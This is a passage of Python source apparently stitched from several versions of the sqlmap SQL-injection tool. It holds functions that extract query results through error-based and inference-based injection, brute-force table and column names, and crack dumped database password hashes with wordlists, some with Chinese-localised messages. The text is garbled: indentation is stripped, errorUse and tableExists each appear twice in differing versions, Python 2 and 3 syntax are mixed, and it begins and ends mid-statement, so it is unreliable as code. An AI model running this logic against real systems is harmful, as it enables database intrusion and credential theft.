infoMsg += "are going blind"
logger.info(infoMsg)
# If we have been here from SQL query/shell we have to check if
# the SQL query might return multiple entries and in such case
# forge the SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table
# can return multiple entries
if fromUser and " FROM " in expression.upper() and (
(Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or
(Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE
and not expression.upper().endswith(
FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))
) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(
expression)
if limitCond:
test = True
if not stopLimit or stopLimit <= 1:
if Backend.getIdentifiedDbms(
) in FROM_DUMMY_TABLE and expression.upper().endswith(
FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):
test = False
if test:
# Count the number of SQL query entries output
countFirstField = queries[Backend.getIdentifiedDbms(
)].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields,
countFirstField, 1)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
if not stopLimit:
count = _goInference(payload,
countedExpression,
charsetType=CHARSET_TYPE.DIGITS,
firstChar=firstChar,
lastChar=lastChar)
if isNumPosStrValue(count):
count = int(count)
if batch or count == 1:
stopLimit = count
else:
message = "the SQL query provided can return "
message += "%d entries. How many " % count
message += "entries do you want to retrieve?\n"
message += "[a] All (default)\n[#] Specific number\n"
message += "[q] Quit"
choice = readInput(message, default='A').upper()
if choice == 'A':
stopLimit = count
elif choice == 'Q':
raise SqlmapUserQuitException
elif isDigit(choice) and int(choice) > 0 and int(
choice) <= count:
stopLimit = int(choice)
infoMsg = "sqlmap is now going to retrieve the "
infoMsg += "first %d query output entries" % stopLimit
logger.info(infoMsg)
elif choice in ('#', 'S'):
message = "how many? "
stopLimit = readInput(message, default="10")
if not isDigit(stopLimit):
errMsg = "invalid choice"
logger.error(errMsg)
return None
else:
stopLimit = int(stopLimit)
else:
errMsg = "invalid choice"
logger.error(errMsg)
return None
elif count and not isDigit(count):
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
elif (not count or int(count) == 0):
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warn(warnMsg)
return None
elif (not stopLimit or stopLimit == 0):
return None
try:
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(
expression,
expressionFields,
expressionFieldsList,
payload,
num=num,
charsetType=charsetType,
firstChar=firstChar,
lastChar=lastChar,
dump=dump)
outputs.append(output)
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (
startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
except KeyboardInterrupt:
print()
warnMsg = "user aborted during dumping phase"
logger.warn(warnMsg)
return outputs
elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper(
).startswith("SELECT ") and " FROM " not in expression.upper():
expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]
outputs = _goInferenceFields(expression,
expressionFields,
expressionFieldsList,
payload,
charsetType=charsetType,
firstChar=firstChar,
lastChar=lastChar,
dump=dump)
return ", ".join(
output or ""
for output in outputs) if not isNoneValue(outputs) else None
def errorUse(expression, dump=False):
"""
Retrieve the output of a SQL query taking advantage of the error-based
SQL injection vulnerability on the affected parameter.
"""
initTechnique(getTechnique())
abortedFlag = False
count = None
emptyFields = []
start = time.time()
startLimit = 0
stopLimit = None
value = None
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(
expression)
# Set kb.partRun in case the engine is called from the API
kb.partRun = getPartRun(alias=False) if conf.api else None
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
# entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
if (dump and (conf.limitStart or conf.limitStop)) or (
" FROM " in expression.upper() and
((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or
(Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.
upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and
("(CASE" not in expression.upper() or
("(CASE" in expression.upper() and "WHEN use" in expression))
) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(
expression, dump)
if limitCond:
# Count the number of SQL query entries output
countedExpression = expression.replace(
expressionFields,
queries[Backend.getIdentifiedDbms()].count.query %
('*' if len(expressionFieldsList) > 1 else expressionFields),
1)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(
countedExpression)
count = unArrayizeValue(
_oneShotErrorUse(countedExpression, countedExpressionFields))
if isNumPosStrValue(count):
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
else:
stopLimit = int(count)
debugMsg = "used SQL query returns "
debugMsg += "%d %s" % (stopLimit, "entries"
if stopLimit > 1 else "entry")
logger.debug(debugMsg)
elif count and not count.isdigit():
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
elif (not count or int(count) == 0):
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warn(warnMsg)
else:
value = [] # for empty tables
return value
if isNumPosStrValue(count) and int(count) > 1:
if " ORDER BY " in expression and (
stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = "due to huge table size do you want to remove "
message += "ORDER BY clause gaining speed over consistency? [y/N] "
if readInput(message, default='N', boolean=True):
expression = expression[:expression.index(" ORDER BY "
)]
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData = getCurrentThreadData()
try:
threadData.shared.limits = iter(
xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (
startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit -
startLimit) > 1
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(
maxValue=(stopLimit - startLimit))
if kb.dumpTable and (len(expressionFieldsList) <
(stopLimit - startLimit) >
CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" %
(field, kb.dumpTable)) == '0':
emptyFields.append(field)
debugMsg = "column '%s' of table '%s' will not be " % (
field, kb.dumpTable)
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
try:
def errorThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
with kb.locks.limit:
try:
threadData.shared.counter += 1
num = next(threadData.shared.limits)
except StopIteration:
break
output = _errorFields(expression, expressionFields,
expressionFieldsList, num,
emptyFields,
threadData.shared.showEta)
if not kb.threadContinue:
break
if output and isListLike(output) and len(
output) == 1:
output = unArrayizeValue(output)
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(
threadData.shared.counter)
for index in xrange(
1 + len(threadData.shared.buffered)):
if index < len(
threadData.shared.buffered
) and threadData.shared.buffered[index][
0] >= num:
break
threadData.shared.buffered.insert(
index or 0, (num, output))
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[
0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(
threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
runThreads(numThreads, errorThread)
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
finally:
threadData.shared.value.extend(
_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
if not value and not abortedFlag:
value = _errorFields(expression, expressionFields,
expressionFieldsList)
if value and isListLike(value):
if len(value) == 1 and isinstance(value[0],
(six.string_types, type(None))):
value = unArrayizeValue(value)
elif len(value) > 1 and stopLimit == 1:
value = [value]
duration = calculateDeltaSeconds(start)
if not kb.bruteMode:
debugMsg = "performed %d quer%s in %.2f seconds" % (
kb.counters[getTechnique()],
'y' if kb.counters[getTechnique()] == 1 else "ies", duration)
logger.debug(debugMsg)
return value
def dictionaryAttack(attack_dict):
suffix_list = [""]
custom_wordlist = [""]
hash_regexes = []
results = []
resumes = []
user_hash = []
processException = False
foundHash = False
for (_, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
regex = hashRecognition(hash_)
if regex and regex not in hash_regexes:
hash_regexes.append(regex)
infoMsg = u"使用哈希hash方法 '%s'" % __functions__[regex].func_name
logger.info(infoMsg)
for hash_regex in hash_regexes:
keys = set()
attack_info = []
for (user, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
foundHash = True
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if re.match(hash_regex, hash_):
item = None
if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS):
hash_ = hash_.lower()
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD,
HASH.MD5_GENERIC, HASH.SHA1_GENERIC):
item = [(user, hash_), {}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE, ):
item = [(user, hash_), {'salt': hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD,
HASH.MSSQL_NEW):
item = [(user, hash_), {'salt': hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC, ):
item = [(user, hash_), {'salt': hash_[0:2]}]
elif hash_regex in (HASH.WORDPRESS, ):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {
'salt': hash_[4:12],
'count': 1 << ITOA64.index(hash_[3]),
'prefix': hash_[:12]
}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
if not resumed:
attack_info.append(item)
user_hash.append(item[0])
else:
infoMsg = u"正在恢复哈希'%s'的密码'%s'" % (hash_, resumed)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += u",对于用户'%s'" % user
logger.info(infoMsg)
resumes.append((user, hash_, resumed))
keys.add(hash_)
if not attack_info:
continue
if not kb.wordlists:
while not kb.wordlists:
# the slowest of all methods hence smaller default dict
if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS):
dictPaths = [paths.SMALL_DICT]
else:
dictPaths = [paths.WORDLIST]
message = u"你想要使用什么字典??\n"
message += u"[1] 默认字典文件 '%s' (按回车)\n" % dictPaths[0]
message += u"[2] 自定义字典文件\n"
message += u"[3] 文件与字典文件列表"
choice = readInput(message, default='1')
try:
if choice == '2':
message = u"自定义字典位置?\n"
_ = readInput(message)
if _:
dictPaths = [readInput(message)]
logger.info(u"使用自定义字典")
elif choice == '3':
message = u"列表文件位置?\n"
listPath = readInput(message)
checkFile(listPath)
dictPaths = getFileItems(listPath)
logger.info(u"使用自定义的字典列表")
else:
logger.info(u"使用默认字典")
dictPaths = filter(None, dictPaths)
for dictPath in dictPaths:
checkFile(dictPath)
if os.path.splitext(dictPath)[1].lower() == ".zip":
_ = zipfile.ZipFile(dictPath, 'r')
if len(_.namelist()) == 0:
errMsg = u"'%s'内没有文件" % dictPath
raise SqlmapDataException(errMsg)
else:
_.open(_.namelist()[0])
kb.wordlists = dictPaths
except Exception, ex:
warnMsg = u"加载字典('%s')时出现问题" % getSafeExString(ex)
logger.critical(warnMsg)
message = u"你想使用常用的密码后缀吗? (slow!) [y/N] "
if readInput(message, default='N', boolean=True):
suffix_list += COMMON_PASSWORD_SUFFIXES
infoMsg = u"开始基于字典的破解(%s)" % __functions__[hash_regex].func_name
logger.info(infoMsg)
for item in attack_info:
((user, _), _) = item
if user and not user.startswith(DUMMY_USER_PREFIX):
custom_wordlist.append(normalizeUnicode(user))
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC,
HASH.SHA1_GENERIC):
for suffix in suffix_list:
if not attack_info or processException:
break
if suffix:
clearConsoleLine()
infoMsg = u"使用后缀 '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = u"启动%d个进程" % _multiprocessing.cpu_count()
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
count = _multiprocessing.Value(
'i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(
target=_bruteProcessVariantA,
args=(attack_info, hash_regex, suffix, retVal,
i, count, kb.wordlists, custom_wordlist,
conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
else:
warnMsg = u"此平台目前不支持多进程哈希破解"
singleTimeWarnMessage(warnMsg)
retVal = Queue()
_bruteProcessVariantA(attack_info, hash_regex, suffix,
retVal, 0, 1, kb.wordlists,
custom_wordlist, conf.api)
except KeyboardInterrupt:
print
processException = True
warnMsg = u"用户在基于字典的攻击阶段中中止(Ctrl + C被按下)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
attack_info = filter(
lambda _: _[0][0] != user or _[0][1] != hash_,
attack_info)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
else:
for ((user, hash_), kwargs) in attack_info:
if processException:
break
if any(_[0] == user and _[1] == hash_ for _ in results):
continue
count = 0
found = False
for suffix in suffix_list:
if found or processException:
break
if suffix:
clearConsoleLine()
infoMsg = u"使用后缀 '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = u"启动%d个进程 " % _multiprocessing.cpu_count(
)
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
found_ = _multiprocessing.Value('i', False)
count = _multiprocessing.Value(
'i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(
target=_bruteProcessVariantB,
args=(user, hash_, kwargs, hash_regex,
suffix, retVal, found_, i, count,
kb.wordlists, custom_wordlist,
conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
found = found_.value != 0
else:
warnMsg = u"此平台目前不支持多进程哈希破解"
singleTimeWarnMessage(warnMsg)
class Value():
pass
retVal = Queue()
found_ = Value()
found_.value = False
_bruteProcessVariantB(user, hash_, kwargs,
hash_regex, suffix, retVal,
found_, 0, 1, kb.wordlists,
custom_wordlist, conf.api)
found = found_.value
except KeyboardInterrupt:
print
processException = True
warnMsg = u"用户在基于字典的攻击阶段中中止(Ctrl + C被按下)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(
block=False)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
def columnExists(columnFile, regex=None):
if kb.columnExistsChoice is None and not any(
_ for _ in kb.injection.data
if _ not in (PAYLOAD.TECHNIQUE.TIME,
PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
warnMsg = u"不建议使用'%s'和'%s'" % (
PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME],
PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
warnMsg += u"进行常用的字段的存在性检查"
logger.warn(warnMsg)
message = u"你确定你要继续吗? [y/N] "
kb.columnExistsChoice = readInput(message, default='N', boolean=True)
if not kb.columnExistsChoice:
return None
if not conf.tbl:
errMsg = u"缺少表参数"
raise SqlmapMissingMandatoryOptionException(errMsg)
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
result = inject.checkBooleanExpression(
safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE,
(randomStr(), randomStr())))
if result:
errMsg = u"因为检测到的结果无效,所以无法对列的存在性进行检查,"
errMsg += u"(很可能是由于使用的注入无法区分错误结果)。"
raise SqlmapDataException(errMsg)
message = u"您要使用哪些常用字段(wordlist)文件?\n"
message += u"[1] 默认 '%s' (按回车)\n" % columnFile
message += u"[2] 自定义"
choice = readInput(message, default='1')
if choice == '2':
message = u"自定义的常用字段文件位置在哪里?\n"
columnFile = readInput(message) or columnFile
infoMsg = u"使用%s文件检查字段是否存在" % columnFile
logger.info(infoMsg)
columns = getFileItems(columnFile, unique=True)
columns.extend(_addPageTextWords())
columns = filterListValue(columns, regex)
table = safeSQLIdentificatorNaming(conf.tbl, True)
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms(
) not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
kb.threadContinue = True
kb.bruteMode = True
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(columns)
threadData.shared.value = []
def columnExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
column = safeSQLIdentificatorNaming(
columns[threadData.shared.count])
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
result = inject.checkBooleanExpression(
safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE,
(column, table)))
kb.locks.io.acquire()
if result:
threadData.shared.value.append(column)
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime(
"%X"), unsafeSQLIdentificatorNaming(column))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = "%d/%d items (%d%%)" % (
threadData.shared.count, threadData.shared.limit,
round(100.0 * threadData.shared.count /
threadData.shared.limit))
dataToStdout(
"\r[%s] [INFO] tried %s" % (time.strftime("%X"), status),
True)
kb.locks.io.release()
try:
runThreads(conf.threads, columnExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = u"用户在检查字段存在性期间中止,sqlmap将只显示部分输出"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = u"找不到字段"
logger.warn(warnMsg)
else:
columns = {}
for column in threadData.shared.value:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
result = not inject.checkBooleanExpression(
"%s" % safeStringFormat(
"EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')",
(column, table, column)))
else:
result = inject.checkBooleanExpression("%s" % safeStringFormat(
"EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))",
(column, table, column, column)))
if result:
columns[column] = "numeric"
else:
columns[column] = "non-numeric"
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]),
columns.items()):
if _ not in kb.brute.columns:
kb.brute.columns.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
return kb.data.cachedColumns
def tableExists(tableFile, regex=None):
if kb.tableExistsChoice is None and not any(
_ for _ in kb.injection.data
if _ not in (PAYLOAD.TECHNIQUE.TIME,
PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
warnMsg = u"不建议使用'%s'和'%s'" % (
PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME],
PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
warnMsg += u"对常用的表的存在性进行检查"
logger.warn(warnMsg)
message = u"你确定要继续吗? [y/N] "
kb.tableExistsChoice = readInput(message, default='N', boolean=True)
if not kb.tableExistsChoice:
return None
result = inject.checkBooleanExpression(
"%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE,
(randomInt(1), randomStr())))
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
if result:
errMsg = u"因为检测到的结果无效,所以无法对数据库中的表的存在性进行检查,"
errMsg += u"(很可能是由于使用的注入无法区分错误结果)"
raise SqlmapDataException(errMsg)
message = u"您要使用哪些常用表(wordlist)文件?\n"
message += u"[1] 默认 '%s' (按回车键)\n" % tableFile
message += u"[2] 自定义"
choice = readInput(message, default='1')
if choice == '2':
message = u"自定义的常用表文件位置在哪里?\n"
tableFile = readInput(message) or tableFile
infoMsg = u"使用自己提供的表文件'%s'检查表的存在性" % tableFile
logger.info(infoMsg)
tables = getFileItems(tableFile,
lowercase=Backend.getIdentifiedDbms()
in (DBMS.ACCESS, ),
unique=True)
tables.extend(_addPageTextWords())
tables = filterListValue(tables, regex)
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(tables)
threadData.shared.value = []
threadData.shared.unique = set()
def tableExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
table = safeSQLIdentificatorNaming(
tables[threadData.shared.count], True)
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms(
) not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
fullTableName = "%s.%s" % (conf.db, table)
else:
fullTableName = table
result = inject.checkBooleanExpression(
"%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE,
(randomInt(1), fullTableName)))
kb.locks.io.acquire()
if result and table.lower() not in threadData.shared.unique:
threadData.shared.value.append(table)
threadData.shared.unique.add(table.lower())
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime(
"%X"), unsafeSQLIdentificatorNaming(table))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = '%d/%d items (%d%%)' % (
threadData.shared.count, threadData.shared.limit,
round(100.0 * threadData.shared.count /
threadData.shared.limit))
dataToStdout(
"\r[%s] [INFO] tried %s" % (time.strftime("%X"), status),
True)
kb.locks.io.release()
try:
runThreads(conf.threads, tableExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = u"用户在检查表的存在性期间中止,sqlmap将只显示部分输出"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = u"没有发现表"
logger.warn(warnMsg)
else:
for item in threadData.shared.value:
if conf.db not in kb.data.cachedTables:
kb.data.cachedTables[conf.db] = [item]
else:
kb.data.cachedTables[conf.db].append(item)
for _ in ((conf.db, item) for item in threadData.shared.value):
if _ not in kb.brute.tables:
kb.brute.tables.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True)
return kb.data.cachedTables
def errorUse(expression, dump=False):
"""
在受影响的参数上使用基于错误的SQL注入漏洞以获取SQL查询的输出。
"""
initTechnique(kb.technique)
abortedFlag = False
count = None
emptyFields = []
start = time.time()
startLimit = 0
stopLimit = None
value = None
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(
expression)
# 如果从API调用引擎,请设置kb.partRun
kb.partRun = getPartRun(alias=False) if conf.api else None
# 我们必须检查SQL查询是否能返回多个条目,
# 在这种情况下,会伪造SQL限制查询输出一个条目
# 注意:我们假设只有从表中获取到查询数据的才能返回多个条目
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \
or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(
expression, dump)
if limitCond:
# 计算输出的SQL查询条目数
countedExpression = expression.replace(
expressionFields,
queries[Backend.getIdentifiedDbms()].count.query %
('*' if len(expressionFieldsList) > 1 else expressionFields),
1)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(
countedExpression)
count = unArrayizeValue(
_oneShotErrorUse(countedExpression, countedExpressionFields))
if isNumPosStrValue(count):
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
else:
stopLimit = int(count)
infoMsg = u"使用的SQL查询返回%d个条目" % stopLimit
logger.info(infoMsg)
elif count and not count.isdigit():
warnMsg = u"无法计算提供的SQL查询的条目数,sqlmap将假定它只返回一个条目"
logger.warn(warnMsg)
stopLimit = 1
elif (not count or int(count) == 0):
if not count:
warnMsg = u"提供的SQL查询没有返回任何输出"
logger.warn(warnMsg)
else:
value = [] # for empty tables
return value
if isNumPosStrValue(count) and int(count) > 1:
# 在巨大的表上,如果每行检索都需要ORDER BY则性能会下降很多
# (在使用ERROR注入的表转储中最为显着)
# SLOW_ORDER_COUNT_THRESHOLD = 10000
if " ORDER BY " in expression and (
stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = u"由于查询的表很大,您是否要删除ORDER BY子句以获得一致性的速度?[Y/N] "
if readInput(message, default="N", boolean=True):
expression = expression[:expression.index(" ORDER BY "
)]
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData = getCurrentThreadData()
try:
threadData.shared.limits = iter(
xrange(startLimit, stopLimit))
except OverflowError:
errMsg = u"查询范围(%d到%d)太大," % (startLimit, stopLimit)
errMsg += u"请重新运行'--fresh-queries'选项"
raise SqlmapDataException(errMsg)
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit -
startLimit) > 1
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(
maxValue=(stopLimit - startLimit))
if kb.dumpTable and (len(expressionFieldsList) <
(stopLimit - startLimit) >
CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" %
(field, kb.dumpTable)) == '0':
emptyFields.append(field)
debugMsg = u"表'%s'的列'%s'将不会被转储," % (field,
kb.dumpTable)
debugMsg += u"因为它看起来是空的"
logger.debug(debugMsg)
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = u"抑制恢复控制台只显示20行信息,"
debugMsg += u"因为打印大量的信息流,会需要很长的时间"
logger.debug(debugMsg)
try:
def errorThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
break
output = _errorFields(expression, expressionFields,
expressionFieldsList, num,
emptyFields,
threadData.shared.showEta)
if not kb.threadContinue:
break
if output and isListLike(output) and len(
output) == 1:
output = output[0]
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(
time.time() - valueStart,
threadData.shared.counter)
for index in xrange(
1 + len(threadData.shared.buffered)):
if index < len(
threadData.shared.buffered
) and threadData.shared.buffered[index][
0] >= num:
break
threadData.shared.buffered.insert(
index or 0, (num, output))
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[
0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(
threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
runThreads(numThreads, errorThread)
except KeyboardInterrupt:
abortedFlag = True
warnMsg = u"用户在枚举期间中止,sqlmap将只显示部分输出"
logger.warn(warnMsg)
finally:
threadData.shared.value.extend(
_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
if not value and not abortedFlag:
value = _errorFields(expression, expressionFields,
expressionFieldsList)
if value and isListLike(value) and len(value) == 1 and isinstance(
value[0], basestring):
value = value[0]
duration = calculateDeltaSeconds(start)
if not kb.bruteMode:
debugMsg = u"在%.2f秒内执行了%d个查询" % (kb.counters[kb.technique], duration)
logger.debug(debugMsg)
return value
def tableExists(tableFile, regex=None):
result = inject.checkBooleanExpression(
"%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE,
(randomInt(1), randomStr())))
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
if result:
errMsg = "can't use table existence check because of detected invalid results "
errMsg += "(most probably caused by inability of the used injection "
errMsg += "to distinguish errornous results)"
raise SqlmapDataException(errMsg)
tables = getFileItems(tableFile,
lowercase=Backend.getIdentifiedDbms()
in (DBMS.ACCESS, ),
